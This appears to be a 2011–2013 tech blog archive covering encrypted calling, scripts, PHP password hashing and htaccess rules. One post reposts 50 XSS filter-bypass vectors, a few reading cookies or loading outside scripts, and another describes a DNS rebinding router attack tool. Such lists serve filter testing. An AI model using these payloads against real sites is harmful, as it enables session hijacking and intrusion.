Showing posts with label web. Show all posts
Thursday, 7 March 2013
Make An Encrypted Call On Android Using RedPhone
If you are worried about your privacy while making voice calls on your phone, RedPhone is a perfect tool to install on your Android phone. RedPhone provides end-to-end encryption so that eavesdropping attackers cannot sniff your call.
RedPhone is an open source encrypted-communication app for Android that integrates well with the system dialer and lets you use the default system dialer and contacts apps to make calls as you normally would. The tool is written by Moxie Marlinspike, the same guy who wrote a famous tool called SSLStrip for performing HTTPS stripping attacks.
It is an open source tool licensed under GPL v3. The GitHub README says: "RedPhone is an application that enables encrypted voice communication between RedPhone users. RedPhone integrates with the system dialer to provide a frictionless call experience, but uses ZRTP to setup an encrypted VoIP channel for the actual call. RedPhone was designed specifically for mobile devices, using audio codecs and buffer algorithms tuned to the characteristics of mobile networks, and using push notifications to maximally preserve your device's battery life while still remaining responsive."
If you wish to understand more about the encryption protocol, you should refer to the wiki.
Install RedPhone
2013-03-07T21:16:00+05:45
Cool Samar
android|mobile|security|web|
E-Paath - A Perfect Computer-based Learning Tool For Your Children
If you are looking for good computer-based learning materials for your small children, E-Paath (E-/Online Lesson) is a perfect choice, especially for the Nepali education scenario. I don't know how much has been done to take this software to the reach of the students/children but I think this software can be a very useful interactive learning material for children.
Developed by OLE Nepal in collaboration with the Department of Education (Nepal), this web-based software provides several modules of online lessons for classes 2-6. The software consists of 18-30 lessons organized in a weekly fashion for four subjects: Nepali, English, Mathematics, and Science. The contents for science are available in both English and Nepali languages. However, mathematics is available only in Nepali language.
E-Paath is Flash-based content and hence requires Flash Player; it can be run in any of the major web browsers such as Mozilla Firefox, Google Chrome, etc. Since E-Paath is web-based content, you can run it on any platform without any problem (I had to change a little bit of code in the karma.html file to run the tool smoothly in Linux but it's still fine; having a web server to serve the pages solves all errors though).
You can download E-Paath from HERE. For installation help, you can refer to this page. You can also access the software online from HERE. Btw, there is no Linux-specific version of the tool available on the website (except for the Sugar desktop environment), and don't try to mirror the online version of E-Paath as the Flash contents seem to be internally referencing the configuration files. Your best bet is to download either of the two available versions and then delete all the unnecessary stuff in there. It just runs fine.
2013-03-07T13:54:00+05:45
Cool Samar
educational material|useful website|web|
Tuesday, 29 January 2013
Swasthani.com Swasthani Ripper
Yesterday I came to know that I can listen to Swasthani online at this site, www.swasthani.com, and I decided to write a Swasthani audio downloader. Since it would be useful for everyone, here is the script.
From the site itself, Sri Swasthani Brata Katha is a very popular ritual observed in Nepal in the Poush month (January – February) during winter. Goddess Sri Swasthani, known to grant wishes of her devotees, is worshipped for the whole month of Poush. The Swasthani Brat Katha (story) is recited everyday. The month long telling of the tales are dedicated to the Goddess and the stories that are mainly narrated are those of Swasthani Devi, Lord Shiva and other Gods.
#!/bin/bash
###############################################
# Swasthani.com Swasthani Ripper              #
# Samar @ http://www.techgaun.com             #
###############################################

if [[ ! -f /tmp/swasthani.txt ]]
then
    wget http://www.swasthani.com/ -O - |
        egrep '<li class="leaf( first| last)?"><a href="/swasthani/' |
        grep -o '<a .*href=.*>' |
        sed -e 's/<a /\n<a /g' |
        sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' > /tmp/swasthani.txt
fi

while read -r line
do
    wget "http://www.swasthani.com$line" -O - |
        egrep 'data="soundFile=http://www.swasthani.com/system/files/' |
        cut -d\" -f6 |
        cut -d= -f2 |
        wget -nc -i -
done </tmp/swasthani.txt
Save the above file as swasthani, then chmod it to give it executable permission and run it. If you have a problem copying the above code, you can check the Swasthani Downloader at GitHub. Enjoy listening to Swasthani, geeks :)
2013-01-29T20:00:00+05:45
Cool Samar
command line|linux|new release|swasthani|ubuntu|web|
Friday, 11 January 2013
Java 0-day In The Wild - Disable Java Plugin NOW
Security researchers have discovered yet another critical Java 0-day exploit being used by the majority of the browser exploit packs such as Blackhole and Cool. Users are urged to DISABLE the Java plugin RIGHT NOW.
In a blog post, French researcher Kaffeine reported that the Java 0-day has been spotted making big hits daily. This particular exploit has proven to be a very serious threat for users. The folks at AlienVault Labs have also reproduced the exploit, and it seems to work on all Java versions across all platforms.
For now, users are strongly urged to disable their Java plugins so that they do not get hit by these 0-days.
So what are you waiting for?
Important links:
How To Disable Java Plugin
Kaffeine's blog post
Alien Vault Labs Post
2013-01-11T20:33:00+05:45
Cool Samar
hacking|internet|news|security|web|
Thursday, 27 December 2012
The Scale Of Universe [A Must Watch]
Well this is so absofuckingly awesome that I decided it is worth making post about this particular site.
Without further delay, I present you this awesome link
Scale of Universe
I hope you loved the site like I did :)
Labels:
internet,
useful website,
web
Saturday, 8 December 2012
DNS Rebinding Attack Using Rebind
Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non-RFC1918) IP address.
Rebind provides an external attacker access to a target router's internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and bind their Web service to the router's WAN interface. Note that remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surfs to a Web site that is controlled, or has been compromised, by the attacker.
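The preconditions listed above can be checked against a router's own configuration. The sketch below is an added example, not part of Rebind or of the original post: it models the RFC 1122 weak/strong end system behaviour and the WAN-side binding the paragraph names, plus Host header validation as a mitigation. The router record, the addresses (documentation ranges) and the host name rebind.example are constructed; the firewall-rule condition is not modelled.

```python
# Added illustration: which router configurations would answer a request that a
# LAN browser sends to the router's WAN address after a DNS rebinding.

def stack_accepts(model, arrival_iface, dst_ip, iface_addrs):
    """RFC 1122 end system models.

    weak:   a packet is accepted if dst_ip is any of the host's addresses.
    strong: a packet is accepted only if dst_ip belongs to the interface
            it arrived on.
    """
    if model == "weak":
        return dst_ip in iface_addrs.values()
    return iface_addrs.get(arrival_iface) == dst_ip


def parse_host_header(value):
    """Return the lower-cased host part of a Host header, or None if malformed."""
    value = (value or "").strip()
    if value.startswith("["):                 # IPv6 literal: [addr] or [addr]:port
        end = value.find("]")
        if end == -1:
            return None
        host, rest = value[1:end], value[end + 1:]
    else:
        host, sep, port = value.partition(":")
        rest = sep + port
    if rest and not (rest[0] == ":" and rest[1:].isdigit()):
        return None
    return host.lower().rstrip(".") or None


def admin_request_served(router, arrival_iface, dst_ip, host_header):
    """True if the router's web interface would answer this request."""
    if not stack_accepts(router["model"], arrival_iface, dst_ip, router["ifaces"]):
        return False                          # dropped by the IP stack
    if dst_ip not in router["http_bind"]:
        return False                          # web service not listening there
    if not router["validate_host"]:
        return True                           # any Host header is answered
    host = parse_host_header(host_header)
    # Mitigation: answer only for the router's own names and addresses.
    return host is not None and (
        host in router["names"] or host in router["ifaces"].values()
    )


# Constructed router record; 203.0.113.0/24 is a documentation range.
ROUTER = {
    "model": "weak",
    "ifaces": {"lan": "192.168.1.1", "wan": "203.0.113.10"},
    "http_bind": {"192.168.1.1", "203.0.113.10"},
    "names": {"router.lan"},
    "validate_host": False,
}

# After rebinding, the LAN browser connects to the WAN address, and the
# request still carries the rebinding domain in its Host header.
REBOUND_REQUEST = ("lan", "203.0.113.10", "rebind.example")

if __name__ == "__main__":
    variants = {
        "as shipped": ROUTER,
        "strong end system model": dict(ROUTER, model="strong"),
        "web UI bound to LAN only": dict(ROUTER, http_bind={"192.168.1.1"}),
        "Host header validated": dict(ROUTER, validate_host=True),
    }
    for label, router in variants.items():
        served = admin_request_served(router, *REBOUND_REQUEST)
        print(f"{label:28} -> {'served' if served else 'refused'}")
```
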
Important Links
Download rebind
Tested Routers (Affected + Not affected)
Rebind FAQ
Defcon Slides
Kind of interesting vector and I guess many are vulnerable out there.
2012-12-08T23:45:00+05:45
Cool Samar
hack tool|hacking|router|security|security bypass|software|web|
Monday, 19 November 2012
50 Awesome XSS Vectors From @soaj1664ashar
Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. They can be quite useful for testing whether a filter can be bypassed.
50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)

1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>">Click Me</a>
Or Grab from pastebin :)
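From a defender's side, lists like this are the reason pattern-stripping filters fail and output is instead encoded for the context it lands in. The following added example (not part of the original post or of @soaj1664ashar's list) runs a few vectors quoted from the list through a hypothetical blacklist filter and through context-aware encoding; naive_blacklist, text_context, href_context and the allowed-scheme set are assumptions made for illustration.

```python
import html
import re

# Schemes a link is allowed to use; everything else is refused (assumption).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Quoted from the list above: items 14, 2, 21 and 43 (markup) ...
MARKUP_VECTORS = [
    "<svg/onload=alert(1)",
    "<div onmouseover='alert(1)'>DIV</div>",
    "<img src=`xx:xx`onerror=alert(1)>",
    "<script/src=data:text/javascript,alert(1)></script>",
]
# ... and the URL values of items 4, 1, 20 and 49.
URL_VECTORS = [
    "jAvAsCrIpT:alert(1)",
    r"javascript:\u0061le%72t(1)",
    "j\ta\tv\ta\ts\tc\tr\ti\tp\tt\t:a\tl\te\tr\tt\t%28\t1\t%29",
    "data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29"
    "%3C%2F%73%63%72%69%70%74%3E",
]


def naive_blacklist(value):
    """Hypothetical pattern-stripping filter: removes <script>...</script>
    blocks and the literal string 'javascript:'."""
    value = re.sub(r"<script>.*?</script>", "", value, flags=re.S)
    return value.replace("javascript:", "")


def survivors(vectors):
    """Vectors that pass through the blacklist completely unchanged."""
    return [v for v in vectors if naive_blacklist(v) == v]


def text_context(value):
    """Encode untrusted data for an HTML text node or a quoted attribute."""
    return html.escape(value, quote=True)


def href_context(url):
    """Encode an untrusted URL for a quoted href attribute.

    Browsers drop tab/CR/LF inside a URL and ignore leading control
    characters and spaces, so those are removed before the scheme is read.
    Spaces are removed everywhere, which is stricter than a browser and can
    only cause extra refusals.
    """
    probe = re.sub(r"[\x00-\x20\x7f]", "", url)
    scheme = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", probe)
    if scheme and scheme.group(1).lower() not in ALLOWED_SCHEMES:
        return "#"                      # refuse javascript:, data:, vbscript:, ...
    return html.escape(url, quote=True)


if __name__ == "__main__":
    print("markup vectors passing the blacklist:",
          len(survivors(MARKUP_VECTORS)), "of", len(MARKUP_VECTORS))
    print("URL vectors passing the blacklist:   ",
          len(survivors(URL_VECTORS)), "of", len(URL_VECTORS))
    for vector in MARKUP_VECTORS:
        print(text_context(vector))     # rendered as text, no tag is opened
    for vector in URL_VECTORS:
        print(repr(vector), "->", href_context(vector))
```

Encoding must match the sink: text_context is for text nodes and quoted attributes only, which is why link targets get the separate scheme check.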
2012-11-19T16:38:00+05:45
Cool Samar
cross site scripting|hacking|web|xss|
PHP 5.5 To Include Simple And Secure Password Hashing API
A few days ago, we saw the release of PHP 5.5.0 Alpha 1 to the public. The PHP development team is serious about addressing the criticism it gets time and again. With the recent leaks from several high-profile sites, a simple-to-use yet secure password hashing API has now been introduced.
Here's the RFC for the simple password hashing API proposed by ircmaxell. It has now been implemented in the PHP core in the 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.
In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this version requirement is that PHP prior to 5.3.7 contains a security issue in its BCRYPT implementation.
Basically, the idea behind the simple password hashing API is that most PHP developers either don't understand the whole concept of strong password hashing or don't think it is worth the effort. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.
Using the API is quite simple. All you have to do to get the hash is:
$hash = password_hash($password, PASSWORD_BCRYPT);
Verifying the password is also quite simple.
if (password_verify($password, $hash)) {
    // pass is correct :)
} else {
    // pass is incorrect :/
}
The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.
Reading materials
RFC for simple password hashing API
Designing an API
PHP 5.5.0 Alpha 1 released
2012-11-19T14:49:00+05:45
Cool Samar
development|hashing|password hacking|php|programming|security|web|
Sunday, 11 November 2012
Wappalyzer - Browser Extension To Identify Web Servers
Wappalyzer is a very useful browser extension that reveals the web technologies and server software that power a webpage. This extension identifies different CMSes, e-commerce portals, blogging platforms, web servers, frameworks, analytics tools, etc.
This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in the server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.
Wappalyzer for Mozilla Firefox
Wappalyzer for Google Chrome
Wappalyzer @ GitHub
Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of the address bar (near the bookmark & reload icons) in Mozilla Firefox. You can click in that area for more details.
One particular setting you may want to disable is the tracking and gathering of anonymous data, which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.
2012-11-11T23:00:00+05:45
Cool Samar
browser|browser addons|fingerprinting|mozilla firefox|tricks and tips|useful website|web|
Thursday, 30 August 2012
How To Automatically Start Firefox In Private Browsing Mode
In this post, I will provide instructions for a few methods to automatically start Firefox in private browsing mode.
Method 1
Go to Edit -> Preferences and then select the Privacy tab. From the History dropdown list labelled "Firefox will", choose Use custom settings for history and then check the Always use the private browsing mode option.
Method 2
The second method involves changing the Firefox configuration, which can be accessed by typing about:config in the address bar. The first method described above essentially changes one particular preference named browser.privatebrowsing.autostart in the background, and this second method involves doing that background job manually on our own.
Once you open the about:config configuration page, search for private and, from the resulting list, change the boolean value of browser.privatebrowsing.autostart to true by double-clicking on it.
I hope this helps. If you got any other method, please drop it as a comment. :)
2012-08-30T01:03:00+05:45
Cool Samar
internet|mozilla firefox|tricks and tips|web|
Monday, 27 August 2012
How To Manually Install Flash Player 11 In Linux
This post provides step-by-step instructions for installing the Flash Player 11 plugin on Ubuntu 11.04 and other versions and distros. This will be helpful for anyone who is having trouble with the Software Center like I had.
Make sure no firefox process is running and then fire up the terminal and type the following commands in order:
mkdir -p ~/flash && cd ~/flash
wget http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.238.orig.tar.gz
tar -zxvf adobe-flashplugin_11.2.202.238.orig.tar.gz
sudo cp -r libflashplayer.so /usr/lib/firefox/plugins
sudo cp -r usr/* /usr
Once you have finished copying the shared object and other necessary files in their respective target directories, you can open the firefox and you're good to go. :)
2012-08-27T22:22:00+05:45
Cool Samar
fedora|internet|linux|mozilla firefox|plugin|tricks and tips|ubuntu|ubuntu 11.10|web|
Saturday, 16 June 2012
IP Address Based Restriction Using Htaccess File
Sometimes you need to restrict access to files on your web server to a certain IP address or IP range only. In such a case, you can apply a simple .htaccess rule, and this post provides information on how to set up IP-based restriction using .htaccess.
First, be sure to enable use of htaccess in apache in your distro.
An example of .htaccess file that will block requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
<limit GET>
order deny,allow
deny from all
allow from 192.168
</limit>
Similarly, an example of .htaccess file that will allow requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
<limit GET>
order allow,deny
allow from all
deny from 192.168
</limit>
You can also specify individual IP addresses instead of the entire subnet according to your need. Also, note that there should be no space after the comma in allow,deny.
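A point worth checking in both files: directives inside <limit GET> apply only to GET (and HEAD), so other methods such as POST are not restricted by them. The following added example (not from the original post) models how Apache 2.2-style Order/Allow/Deny directives are evaluated so the behaviour can be tested offline; the function names and the sample client addresses are constructed, and it assumes no other access rules apply.

```python
import ipaddress
import re

# The two .htaccess bodies from the post, plus the first one without <limit>.
LAN_ONLY = """\
<limit GET>
order deny,allow
deny from all
allow from 192.168
</limit>
"""
ALL_BUT_LAN = """\
<limit GET>
order allow,deny
allow from all
deny from 192.168
</limit>
"""
WITHOUT_LIMIT = """\
order deny,allow
deny from all
allow from 192.168
"""


def parse(text):
    """Read one flat .htaccess body into a small policy dict.

    Simplification: every directive in the file is treated as belonging to
    the single <limit> section, if there is one.
    """
    policy = {"methods": None, "order": "deny,allow", "allow": [], "deny": []}
    for raw in text.splitlines():
        line = raw.strip()
        low = line.lower()
        limit = re.match(r"<limit\s+([^>]+)>", line, re.I)
        if limit:
            methods = set(limit.group(1).split())
            if "GET" in methods:
                methods.add("HEAD")       # limiting GET also limits HEAD
            policy["methods"] = methods
        elif low.startswith("order"):
            policy["order"] = low.split()[1]
        elif low.startswith(("allow from", "deny from")):
            kind, _, *specs = low.split()
            policy[kind].extend(specs)
    return policy


def _matches(spec, ip):
    if spec == "all":
        return True
    if "/" in spec:                       # CIDR form such as 192.168.0.0/16
        return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    want = spec.rstrip(".").split(".")    # partial address, whole octets only
    return ip.split(".")[:len(want)] == want


def allowed(policy, method, ip):
    """Would this request get past the modelled directives?"""
    if policy["methods"] is not None and method not in policy["methods"]:
        return True                       # directives do not cover this method
    hit_allow = any(_matches(s, ip) for s in policy["allow"])
    hit_deny = any(_matches(s, ip) for s in policy["deny"])
    if policy["order"] == "deny,allow":
        # Deny is evaluated first, Allow overrides it; default is allow.
        return hit_allow or not hit_deny
    # allow,deny: Allow is evaluated first, Deny overrides it; default is deny.
    return hit_allow and not hit_deny


if __name__ == "__main__":
    # Constructed sample requests: one LAN client, one outside client.
    for name, body in (("LAN only", LAN_ONLY), ("all but LAN", ALL_BUT_LAN),
                       ("LAN only, no <limit>", WITHOUT_LIMIT)):
        policy = parse(body)
        for method, ip in (("GET", "192.168.1.10"), ("GET", "203.0.113.7"),
                           ("POST", "203.0.113.7")):
            verdict = "allowed" if allowed(policy, method, ip) else "denied"
            print(f"{name:22} {method:4} {ip:14} {verdict}")
```

Dropping the <limit> wrapper, as in the third body, makes the same three directives apply to every request method.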
Once you create the .htaccess file, make sure you've provided proper permission to it.
samar@Techgaun:/var/www/samar$ chmod 0644 .htaccess
Once you have made the .htaccess file and given it the proper permissions, you might need to reload the Apache server so that the new configuration takes effect (although a per-directory .htaccess does not require reloading Apache in most cases).
samar@Techgaun:/var/www/samar$ sudo service apache2 reload
I hope this comes handy :)
2012-06-16T20:18:00+05:45
Cool Samar
apache|htaccess|linux|web|
Sunday, 3 June 2012
Check Your Plugins To Keep Firefox Updated and Safe
The Mozilla Foundation now provides an online tool with a simple interface to check whether the plugins you've installed are up to date. The objective of this service is to keep your third-party plugins up to date, which helps Firefox run safely and smoothly.
The service lets you check all the plugins and update the outdated ones from a simple UI in two major steps:
Step 1: Click Update to update a plugin.
Step 2: Complete all recommended updates before restarting your browser.
Head on to Firefox Browser Plugin Check & Updates.
Stay safe :)
2012-06-03T21:58:00+05:45
Cool Samar
browser|mozilla firefox|security|tricks and tips|web|
Monday, 9 April 2012
Email Obfuscation Tricks In The Age Of Spammers
Every day thousands of spam emails are propelled to our e-mail addresses, and the algorithms used by spam bots are getting increasingly sophisticated and are already able to harvest a few kinds of obfuscated e-mail addresses. While this race between spammers and web users goes on, we can still use several obfuscation tricks either to prevent bots from harvesting e-mail addresses or to fool bots into picking completely wrong e-mail addresses. Here, I am going to illustrate some useful obfuscation tricks I've come across.
The Very Basics
A very basic way of obfuscating emails is by replacing the characters such as @ and . with at and dot. Following are few samples:
samar[at]techgaun[dot]com
samar (at) techgaun (dot) com
And, below are some examples that would be nearly impossible to harvest :P. Just be more creative with them and no automated spam bot/email harvester out there will be able to get you :D. However, this might possibly create some kind of DoS like scenario for many legitimate users.
<myfirstname> (at) techgaun (dot) com
<myfirstname> (at) <lastname> (dot) com
Using Image
Another method is to create a small, appropriate image that displays your e-mail address. That should be more than enough, so just create a PNG/GIF of your e-mail address.
Text Encodings
You could use text encodings, JavaScript obfuscation, etc. An example of this is converting ASCII to Unicode and then applying another level of obfuscation on top of it.
The unicode version:
samar@techgaun.com
will properly show as:
samar@techgaun.com
Obfuscations using CSS
Reverse Text Direction
CSS allows you to display text in the reverse direction. For an HTML element such as
<div class="email"> moc.nuaghcet@ramas</div>
you can specify the following CSS properties to use this obfuscation trick.
.email { unicode-bidi: bidi-override; direction: rtl; float: left; }
Hidden Text Within E-mail address
Another method is to put a hidden HTML element between the parts of the e-mail address and set its display style to none. Spam bots that try to extract the data from such markup are likely to get wrong information. An example is:
samar@tech<span style='display: none;'>nique</span>gaun.com
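The three markup tricks above (text encoding, reversed text, hidden span) can be generated and checked against a simple address pattern. This is an added example in Python, not code from the original post; the pattern, the function names and the choice of decimal character references are assumptions made for the illustration.

```python
import html
import re

# Simple address pattern standing in for a scraper (an assumption made for
# this example; real bots differ in what they decode).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
TAG_RE = re.compile(r"<[^>]+>")
HIDDEN_RE = re.compile(r'<span style="display: none;">.*?</span>')


def entity_encode(address):
    """Text Encodings: each character as a decimal character reference."""
    return "".join("&#%d;" % ord(ch) for ch in address)


def reversed_markup(address):
    """Reverse Text Direction: stored reversed, shown with direction: rtl."""
    return '<div class="email">%s</div>' % address[::-1]


def hidden_span_markup(address, decoy="nique"):
    """Hidden Text: display:none decoy halfway through the first domain label."""
    local, domain = address.split("@", 1)
    cut = len(domain.split(".", 1)[0]) // 2
    span = '<span style="display: none;">%s</span>' % decoy
    return "%s@%s%s%s" % (local, domain[:cut], span, domain[cut:])


def scraper_sees(markup, decode_entities=False, strip_tags=False):
    """Addresses the pattern finds in raw, decoded or tag-stripped markup."""
    text = html.unescape(markup) if decode_entities else markup
    if strip_tags:
        text = TAG_RE.sub("", text)
    return EMAIL_RE.findall(text)


def visible_text(markup):
    """Text left after dropping hidden spans and tags (CSS direction not applied)."""
    return TAG_RE.sub("", HIDDEN_RE.sub("", html.unescape(markup)))


if __name__ == "__main__":
    addr = "samar@techgaun.com"  # the address used in the post
    for build in (entity_encode, reversed_markup, hidden_span_markup):
        markup = build(addr)
        print(build.__name__, "->", markup)
        print("  raw:", scraper_sees(markup),
              "decoded:", scraper_sees(markup, decode_entities=True),
              "stripped:", scraper_sees(markup, strip_tags=True))
```

The entity-encoded form only protects against scrapers that do not decode character references, while the hidden span makes a tag-stripping scraper collect the wrong address.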
Edit: I found this link with some good examples so I thought I would rather refer you all to this webpage.
2012-04-09T20:16:00+05:45
Cool Samar
Labels:
email,
tricks and tips,
web
Thursday, 29 March 2012
Extracting All Hyperlinks From Webpages - Python
In this example, I am going to show how easily you can extract all the links in a webpage using Python. If you are learning to write a small-scale crawler, this can be a quick start on how to extract the links from any webpage.
Basically, we send an HTTP request to the webpage and read the HTML response, unless the connection cannot be established. In that case, we simply inform the user that we could not connect to the website.
For all of this, we will import a few modules; the most important ones are re and urllib2, for regular expressions and HTTP requests/responses respectively.
We then write the regex for hyperlinks, which we will search for in the HTML data the server sends back in response to our request. Note the pattern <a href=[\'"]?([^\'" >]+). The parentheses are there to capture the information we need, i.e. the actual links.
Now that you understand what we'll be doing, below is the Python script to extract the hyperlinks from any webpage.
#!/usr/bin/python
# Python 2 script (uses urllib2 and the print statement)
import re, urllib2
from sys import argv

# Take the URL from the command line, or fall back to the default
if (len(argv) != 2):
    print "No URL specified. Taking default URL for link extraction"
    url = "http://www.techgaun.com"
else:
    url = str(argv[1])

# The group captures the value of href, with or without quotes
links_regex = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)
url_request = urllib2.Request(url)
try:
    response = urllib2.urlopen(url_request)
    html = response.read()
    links = links_regex.findall(html)
    print '\n'.join(links)
except urllib2.URLError:
    print "Can't Connect to the website"
Now run the script as python extracter.py http://www.techgaun.com, or with any URL you wish.
So isn't it a good start for writing your own simple web crawler? :P
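For a crawler, it matters which links the pattern above misses or picks up by mistake. The following added example (Python 3, not part of the original post) runs the same regex and an html.parser based extractor over a constructed sample page; the class and function names and the sample markup are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# The pattern from the script above, unchanged.
LINKS_REGEX = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)

# Constructed sample page (not fetched from anywhere).
SAMPLE_HTML = """
<a href="http://www.techgaun.com/">home</a>
<a class="nav" href='/2012/03/post.html'>attribute before href</a>
<A HREF=about.html>unquoted, upper case</A>
<a href="javascript:void(0)">script pseudo-link</a>
<a href="mailto:someone@example.com">mail</a>
<!-- <a href="http://old.example.com/">commented out</a> -->
"""


class LinkParser(HTMLParser):
    """Collect href values of <a> tags, resolved against a base URL."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href")
        if not href:
            return
        absolute = urljoin(self.base_url, href.strip())
        # Keep only schemes a crawler should follow.
        if urlsplit(absolute).scheme in ("http", "https"):
            self.links.append(absolute)


def extract_links(html, base_url):
    """Links found by the parser, as absolute http(s) URLs."""
    parser = LinkParser(base_url)
    parser.feed(html)
    return parser.links


def regex_links(html):
    """Links found by the regex from the original script."""
    return LINKS_REGEX.findall(html)


if __name__ == "__main__":
    print("regex :", regex_links(SAMPLE_HTML))
    print("parser:", extract_links(SAMPLE_HTML, "http://www.techgaun.com/"))
```

The regex skips the link whose href is not the first attribute and returns the commented-out, javascript: and mailto: entries, while the parser returns only the three followable links as absolute URLs.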
2012-03-29T18:19:00+05:45
Cool Samar
Labels:
internet,
programming,
python,
web
Tuesday, 28 February 2012
Reloading The Page Using Javascript
If you wish to put a nice little "Reload this page" link in your page, JavaScript provides a reload() method that you can use for reloading the page.
The reload() method of window.location can be used to reload the page and works well in most browsers. An example snippet is shown below:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <title>Reload example</title>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta name="generator" content="Geany 0.20" />
</head>
<body>
    <iframe height="300" width="300" src="http://www.google.com"></iframe>
    <a href="javascript:window.location.reload(true);">Reload this page</a>.
</body>
</html>
I hope this comes in useful sometime.
2012-02-28T12:15:00+05:45
Cool Samar
Labels:
html,
javascript,
programming,
tricks and tips,
web
Tuesday, 17 January 2012
Watch ASCII Star Wars Through Telnet
Just thought I'd share this cool link that features Star Wars over telnet. Telnet to the remote server and you'll be shown the Star Wars story.
Open your terminal and type the following:
telnet towel.blinkenlights.nl
And, the online web version is available at HERE
2012-01-17T11:47:00+05:45
Cool Samar
fun|internet|web|
Monday, 21 March 2011
Offline version of UnicodeNepali.Com V3 Converter
